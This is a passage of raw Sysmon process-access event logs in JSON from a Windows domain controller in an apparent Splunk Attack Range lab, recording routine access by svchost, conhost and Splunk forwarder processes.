C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2783,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2784,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2785,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2786,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2787,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2788,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2789,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.183\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020E-5F25-0000-001035E50400}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.183","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020E-5F25-0000-001035E50400}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2790,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:58.323\r\nSourceProcessGUID: {A837DB8D-020E-5F25-0000-001035E50400}\r\nSourceProcessId: 4552\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:58.323","SourceProcessGUID":"{A837DB8D-020E-5F25-0000-001035E50400}","SourceProcessId":"4552","SourceThreadId":"4616","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program 